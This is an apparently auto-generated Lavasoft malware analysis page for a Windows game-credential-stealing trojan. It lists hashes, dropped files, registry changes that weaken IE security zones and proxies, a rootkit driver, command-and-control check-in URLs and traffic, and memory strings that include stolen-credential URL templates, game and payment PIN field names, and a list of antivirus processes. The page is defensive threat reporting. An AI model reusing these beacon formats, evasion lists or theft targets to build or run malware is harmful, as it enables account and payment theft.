Gen.Variant.Zusy.46800_4f1aed7bbb

by malwarelabrobot on December 17th, 2014 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Zusy.46800 (B) (Emsisoft), Gen:Variant.Zusy.46800 (AdAware), GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 4f1aed7bbbe43e65cf416fdedb00ecff
SHA1: b9e73c7f73e697932bc7cd2fa2eff0f133da39f9
SHA256: b7ab11bcccb084b0fd3fea86713fe576efe9d8e0e2e36ac266e0491aa48b0b33
SSDeep: 6144:FRkVBq2ypZBpupPAcYrV3eyZuU2i1mB1kCrN:HCBq2GXpuOt3eGrrY1
Size: 228352 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: AirInstaller
Created at: 2013-03-15 12:36:24
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

regsvr32.exe:816
%original file name%.exe:320

The Trojan injects its code into the following process(es):

svchost.exe:1152

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:320 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\ (4 bytes)
%System%\drivers\3a2ba1fa.sys (71 bytes)
%WinDir%\WinSxS (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Coor.bat (112 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\giynhrYsD.dll (90 bytes)
%System%\wshtcpip.dll (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\index.dat (400 bytes)
%WinDir%\AppPatch (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B1.zip (19 bytes)
%System%\config\SOFTWARE.LOG (11686 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A1.zip (19 bytes)
%WinDir%\REGISTRATION (4 bytes)
%WinDir% (492 bytes)
C:\$Directory (2360 bytes)
%System%\wshtcptk.dll (19 bytes)
%System% (4664 bytes)
%System%\midimap.dll (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dyeky.dll (90 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\C1.zip (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ZHHNK1RJ\desktop.ini (67 bytes)
%System%\drivers\4680947c.sys (32 bytes)
%WinDir%\WinSxS\Policies\x86_Policy.6.0.Microsoft.Windows.Common-Controls_6595b64144ccf1df_x-ww_5ddad775 (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WHUF81E3\desktop.ini (67 bytes)
%System%\wbem (1064 bytes)
%System%\drivers (32 bytes)
%Documents and Settings%\All Users\Start Menu (4 bytes)
%System%\config\software (4303 bytes)
%System%\kakutk.dll (294 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G1U3S5Y7\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\index.dat (16 bytes)
%System%\wbem\Repository\FS\INDEX.BTR (4624 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KQHFGPHV\desktop.ini (67 bytes)
%System%\wbem\Repository\FS\OBJECTS.DATA (10986 bytes)

The Trojan deletes the following file(s):

%System%\drivers\4680947c.sys (0 bytes)

Registry activity

The process regsvr32.exe:816 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\CLSID\{AB705622-B25B-491B-A6BF-4A46FDDBC88E}\VersionIndependentProgID]
"(Default)" = "IEHlprObj.IEHlprObj"

[HKCR\TypeLib\{AB705628-B25B-491B-A6BF-4A46FDDBC88E}\1.0\0\win32]
"(Default)" = "%System%\kakutk.dll"

[HKCR\Interface\{AB705621-B25B-491B-A6BF-4A46FDDBC88E}\TypeLib]
"(Default)" = "{AB705628-B25B-491B-A6BF-4A46FDDBC88E}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCR\TypeLib\{AB705628-B25B-491B-A6BF-4A46FDDBC88E}\1.0]
"(Default)" = "IEHelper 1.0 Type Library"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCR\IEHlprObj.IEHlprObj\CurVer]
"(Default)" = "IEHlprObj.IEHlprObj.1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCR\Interface\{AB705621-B25B-491B-A6BF-4A46FDDBC88E}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{AB705621-B25B-491B-A6BF-4A46FDDBC88E}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\TypeLib\{AB705628-B25B-491B-A6BF-4A46FDDBC88E}\1.0\FLAGS]
"(Default)" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCR\IEHlprObj.IEHlprObj.1]
"(Default)" = "IEHlprObj Class"

[HKCR\Interface\{AB705621-B25B-491B-A6BF-4A46FDDBC88E}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCR\CLSID\{AB705622-B25B-491B-A6BF-4A46FDDBC88E}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\Interface\{AB705621-B25B-491B-A6BF-4A46FDDBC88E}]
"(Default)" = "IIEHlprObj"

[HKCR\IEHlprObj.IEHlprObj]
"(Default)" = "IEHlprObj Class"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCR\IEHlprObj.IEHlprObj.1\CLSID]
"(Default)" = "{AB705622-B25B-491B-A6BF-4A46FDDBC88E}"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "15 98 20 1B 1E E7 D1 34 F6 7E C6 18 68 C2 9A 84"

[HKCR\CLSID\{AB705622-B25B-491B-A6BF-4A46FDDBC88E}]
"(Default)" = "IEHlprObj Class"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCR\CLSID\{AB705622-B25B-491B-A6BF-4A46FDDBC88E}\InprocServer32]
"(Default)" = "%System%\kakutk.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCR\CLSID\{AB705622-B25B-491B-A6BF-4A46FDDBC88E}\ProgID]
"(Default)" = "IEHlprObj.IEHlprObj.1"

[HKCR\TypeLib\{AB705628-B25B-491B-A6BF-4A46FDDBC88E}\1.0\HELPDIR]
"(Default)" = "%System%\"

The process %original file name%.exe:320 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\CLSID\HOOK_ID]
"Name" = "%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "49 20 93 85 03 9A 75 75 8A E3 0B E7 DE DC D1 D5"

[HKCR\CLSID\SYS_DLL]
"Name" = "giynhrYsD.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%System%\jdiguuwBsh, \??\%System%\jdiguuwBsh"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5 File path
90affacb3c4f110ba63df2be93f2e41a c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\A1.zip
0b14dfd82a538cf8933435397dbc4925 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\B1.zip
743cac2a53ba132d086853141246d7d7 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\C1.zip
5c12660a97822f6e61576943b49aaad6 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\H7Ui28hui
a581a82cb3267abb7543946ada12bcfa c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\dyeky.dll
1f08a122535451e44926934069f39d2a c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\giynhrYsD.dll
883ef2dd3c9f68691ce02daac7267d41 c:\Program Files\Java\jre6\bin\swe5i
fd60844f7dc0cf7c7afa70b7ec6d0a7e c:\Program Files\Java\jre6\lib\deploy\jqs\ie\7PhfhwYk
565caee4622770caac3aa1213d6738cc c:\WINDOWS\system32\drivers\3a2ba1fa.sys
4e3d06d6e68eedb52565080f55b460d3 c:\WINDOWS\system32\jdiguuwBsh
28d9e9a9f8184972ce262a4d9fad6aac c:\WINDOWS\system32\kakutk.dll
4e3d06d6e68eedb52565080f55b460d3 c:\WINDOWS\system32\wshtcptk.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

Using the driver "%System%\drivers\3a2ba1fa.sys" the Trojan controls loading executable images into a memory by installing the Load image notifier.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 806912 1536 0 033faf6d9fca77f29d3529b55e7abba8
.data 811008 204800 201216 5.53196 4a79f1b149a5041886eaece7dd20e9be
.rsrc 1015808 8192 6144 0.378005 0445acc62bc38f6c01f643cc6b44dfe6
.reloc 1024000 4096 1536 0.065844 c158ec72e8b1f3d2ed53aff4d702d457
.idata 1028096 20480 16896 3.2386 31347d4c9120a884a1f55d165cb539f2

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://198.105.210.188/get.asp?mac=D51B80D0FFCCD68BB0C633ADD668FF39&os=winxp Professional&avs=unknow&ps=NO.&ver=jack
hxxp://educaresurvivorship.com/get.asp?mac=D51B80D0FFCCD68BB0C633ADD668FF39&os=winxp Professional&avs=unknow&ps=NO.&ver=jack
hxxp://www.educaresurvivorship.com/get.asp?mac=D51B80D0FFCCD68BB0C633ADD668FF39&os=winxp Professional&avs=unknow&ps=NO.&ver=jack 198.105.210.188


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET USER_AGENTS Suspicious user agent (Google page)
ET TROJAN Win32/Comisproc Checkin
ET TROJAN Murlo Trojan Checkin

Traffic

GET /get.asp?mac=D51B80D0FFCCD68BB0C633ADD668FF39&os=winxp Professional&avs=unknow&ps=NO.&ver=jack HTTP/1.1
User-Agent: Google page
Connection: Keep-Alive
Cache-Control: no-cache
Host: VVV.educaresurvivorship.com


HTTP/1.1 404 Not Found
Date: Tue, 16 Dec 2014 05:40:31 GMT
Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/1.0.1e-fips mod_bwlimited/1.4
X-Powered-By: PHP/5.4.25
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
4cd..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
 "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<htm
l xmlns="hXXp://VVV.w3.org/1999/xhtml">.<head>.<meta http-
equiv="Content-Type" content="text/html; charset=utf-8" />.<titl
e>EduCare Survivorship - Page Not Found</title>.<link href
="/styles/styles.css" rel="stylesheet" type="text/css" />.</head
>.<body>.<div id="container">..<div id="nav">&nbs
p;</div>..<img id="banner_img" src="/images/educares.jpg" use
map="#banner_img" border="0" width="990" height="416" alt="EduCare, In
c" />..<map id="_banner_img" name="banner_img">...<area sh
ape="rect" coords="792,341,985,411" href="hXXp://VVV.educareinc.com" a
lt="EduCare, Inc" />..</map>..<div id="subnav">.    .&n
bsp;..</div>..<div id="content"> ...<h1>Page Not Fou
nd</h1>...<p>We apologize for the inconvenience, but the r
equested page (VVV.educaresurvivorship.com/get.asp) was not found.<
/p>.        <p><a href="/" title="Return Home">Return H
ome</a></p>..</div> ..<div id="footer-content">
;<a href="hXXp://EduCareInc.com" target="_blank">EduCareInc.com&
lt;/a> ... 8420 ..
<<< skipped >>>


GET /get.asp?mac=D51B80D0FFCCD68BB0C633ADD668FF39&os=winxp Professional&avs=unknow&ps=NO.&ver=jack HTTP/1.1
User-Agent: Google page
Host: 198.105.210.188
Cache-Control: no-cache


HTTP/1.1 302 Moved Temporarily
Date: Tue, 16 Dec 2014 05:40:30 GMT
Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/1.0.1e-fips mod_bwlimited/1.4
X-Powered-By: PHP/5.4.25
Location: hXXp://VVV.educaresurvivorship.com/get.asp?mac=D51B80D0FFCCD68BB0C633ADD668FF39&os=winxp Professional&avs=unknow&ps=NO.&ver=jack
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8







The Trojan connects to the servers at the folowing location(s):







svchost.exe_1152_rwx_10001000_0003D000:




Lineage Windows Client
[email protected]
%s?up=%s&pp=%s&spp=%s
Diablo III.exe
ws2_32.dll
ti.asp?up=%s&pp=%s
%s?ap=%s&sp=%s&up=%s&pp=%s&ssp=%s&spp=%s&rp=%s&lp=%d
X,
%s?ap=%s&sp=%s&up=%s&pp=%s&ssp=%s&spp=%s&rp=%s
DNF.cfg
\res\PCOTP.okf
kernel32.dll
dnf.exe
%sHShield\ehsvc.dll
pcotp.exe
%s?ap=%s&sp=%s&mp=%s&ssp=%s&spp=%s&rp=%s&up=%s&pp=%s
%s?ap=%s&sp=%s&mp=%s&ssp=%s&spp=%s&up=%s&pp=%s
%s?ap=%s&sp=%s&up=%s&pp=%s&ssp=%s&spp=%s
explorer.exe
%s?ap=%s&sp=%s&up=%s&pp=%s&lp=%s&spp=%s
maplestory.exe
%s?ap=%s&sp=%s&up=%s&pp=%s&ssp=%s&spp=%s&lp=%s&rp=%s&op=%s
ngm.exe
baramt.exe
winbaram.exe
ngmdll.dll
%s?ap=%s&sp=%s&up=%s&pp=%s&spp=%s&ssp=%s
0xx
8888888
%s?ap=%s&sp=%s&up=%s&pp=%s&ssp=%s
client.exe
msvcr90.dll
119.205.224.147
119.205.224.149
119.205.224.150
119.205.224.151
119.205.224.153
119.205.224.159
119.205.224.157
119.205.224.158
119.205.224.160
119.205.224.163
YGOnline.exe
211.39.155.77
211.39.155.78
211.39.155.79
211.39.155.84
211.39.155.81
211.39.155.82
211.39.155.83
211.39.155.80
211.39.155.85
211.39.155.86
211.39.155.95
211.39.155.96
211.39.155.97
211.39.155.98
211.39.155.99
211.39.155.100
211.39.155.101
211.39.155.102
211.39.155.106
211.39.155.107
211.39.155.108
211.39.155.109
211.39.155.110
211.39.155.90
211.39.155.88
211.39.155.89
cabal2main.exe
gameguard.des
%s-%s-%s-%s
%s-%s-%s-%s-%s
%s-%s-%s
ie ....Hwnd::::::::%x
Hwnd::::::::%x,class:%s
OLEACC.DLL
1111111%s:%s
gtc_pay_info%d
btc_pay_passwd
btc_pay_info%d
FunnyCard$txtFunnyCardNo%d
ftc_pay_info%d
Pyunweijum$txtPin%d
ptc_pay_info%d
TeenCash$txtPin%d
tc_pay_info%d
ctl00$ContentPlaceHolder1$PayInfoControl$GAMEGIFTControl$txt_gamegift_pin%d
GameCulture$txtPinNumber_%d
ctl00$ContentPlaceHolder1$PayInfoControl$GTCARDControl$txt_gtcard_pin%d
ctl00$ContentPlaceHolder1$PayInfoControl$BOOKLIFEControl$txt_booklife_pin%d
ctl00$ContentPlaceHolder1$PayInfoControl$TEENCASHControl$txt_teencash_pin%d
fifazf.exe
raycity.exe
launchern.exe
ModuMarble.exe
cstrike-online.exe
suddenattack.exe
KartRider.exe
%s?ap=%s&up=%s&pp=%s&ssp=%s
sdkjfwuieui78238iueufhueir26537848923weuhifhuwhfuiweyuYUYFDHHJHJHJYTYRTRUDHHJHJDHJAJDJHiuwruy7823828305uweuiryufweyuqr7823yuweuyruifwehfdhudsygfksjadkjlssladgluoiweweqtyuiwer7878weyfuhdsdsafhbyguwqr727283qwyuweuiyryuiyuGFREERTYGYHBHAHBDBGXBGATFDHUAUDHYTDYHADHJYUDYGAHDJHADHJHJDHJAHJDHJ65218489u832rhuewhufuywebhfdssbabufhwewhueryfy8qrq7ryhdshbfcbnashufyguwetwyqtryuqwrhhbsabjfhjsafgwekfwepqweiuwquiosifpwqetoweuiqr892389r89weuifjkweur823789ruweuiufuiweqtouiwqtuiowetuijhdshfgyasgfhbhfweyuryuwehuerhgnsdgUUIYUTYHBHDUWYHDHYTDTTRWYETYYUADHBDBABDIAIHJKJFJKKJFLLUIYURYUWTOIPQHHHGXVVCXCAHJDGDWUUYDYHSDHisdhuafuiweyuqr67782378r89wer7uhusehfuwyueehfh2eywq67478yhfrhhsduafh8yweqr7wehufiuweuiruifwq787qwyhuwefyuweyrfrtqw7e8ry78wehuhusdahfhuwyueqeryupwiqeshdfbdsnaxvnmhajdshjdfygwqethufisdshjfuiasyhufweyutyqweuiweqtuiweytyuieryuHGHGHDFTRREYUHGFYGHJHKHUTYTYUUYYUHYHGFGUYIUITYERWEDVGHFBGBVFSDGVBHJGHGFTRFHJKJJHGFFGYHJhjsdyufygusadftyufsayufyuqwer78236tr7sgtsafhjasygftg7t6q2rygudsaygfyuweyurfqtyuwfggwqrtt2678398712307r53267ryesdgufsady
Mozilla/4.0 (compatible)
sos.exe
ykm.exe
~!@#$%^&*
heroes.exe
MYSFTY.EXE
CHROME.EXE
FIREFOX.EXE
NVCAGENT.NPC
NSVMON.NPC
NSAVSVC.NPC
V3SP.EXE
V3SVC.EXE
V3UP.EXE
V3LSVC.EXE
V3LRUN.EXE
V3LTRAY.EXE
MUPDATE2.EXE
SGSVC.EXE
SGUI.EXE
SGRUN.EXE
NAVERAGENT.EXE
AVP.EXE
AYRTSRV.AYE
AYUPDSRV.AYE
AYAGENT.AYE
AVGNT.EXE
AVCENTER.EXE
AVGUARD.EXE
AVSCAN.EXE
AVUPGSVC.EXE
AVWSC.EXE
AVASTSVC.EXE
ASHUPD.EXE
AVASTUI.EXE
SHSTAT.EXE
MCTRAY.EXE
UDATERUI.EXE
MSSECES.EXE
EGUI.EXE
EKRN.EXE
CCSVCHST.EXE
NAVW32.EXE
UPDATESRV.EXE
VSSERV.EXE
SECCENTER.EXE
BDAGENT.EXE
BDREINIT.EXE
AVGAM.EXE
AVGEMC.EXE
AVGNSX.EXE
AVGRSX.EXE
AVGFRW.EXE
AVGWDSVC.EXE
AVGUPD.EXE
bsier2.dat
bsiezq.dat
bsiejh.dat
bsiepk.dat
bsielq.dat
bsgdsos.dat
bsiegd.dat
bsiemxd.dat
bsiedk.dat
bsdfsos.dat
bsdfloc.dat
bsiednf.dat
bsiear.dat
bsieal.dat
V3LRun.exe
V3LTray.exe
iexplore.exe
EstRtw.sys
fltlib.dll
Mozilla/5.0 (compatible)
ntdll.dll
urlinfo
\\.\%s
Mozilla/6.0 (compatible)
\??\%s
Software\Microsoft\Windows\CurrentVersion\Run
r2client.exe
|9|3|1|1|0|
|9|1|1|1|0|
CMStarterCore.exe
archeage.exe
msvcr100.dll
x2game.dll
%s%s.dat
%s[%d]
lin.bin
mss32.dll
%s?ap=%s&sp=%s&up=%s&pp=%s&ssp=%s&rp=






 
 




 
No votes yet












				


							


			

				
					  
							

		

		


					
							

	

	
	        


	

        
      
 

      
      

      
    
 

    
  
 

		


		

		
			

			

				

					Lavasoft is the maker of Ad-Aware,
					the world's most popular anti-malware 
					software with over 450 million 
					downloads.
				

				

					© 2026 Lavasoft. All rights reserved.

					Terms Of Use |   Privacy Policy
					


								

			


		

		


	

	
	

	

		x
		
Our best antivirus yet!

		
Fresh new look. Faster scanning. Better protection.

		

			
Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

			
For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

			
			Download adaware antivirus 12
		

		No thanks, continue to lavasoft.com
	

	

		

			close x
			
Discover the new adaware antivirus 12

			
Our best antivirus yet

			Download Now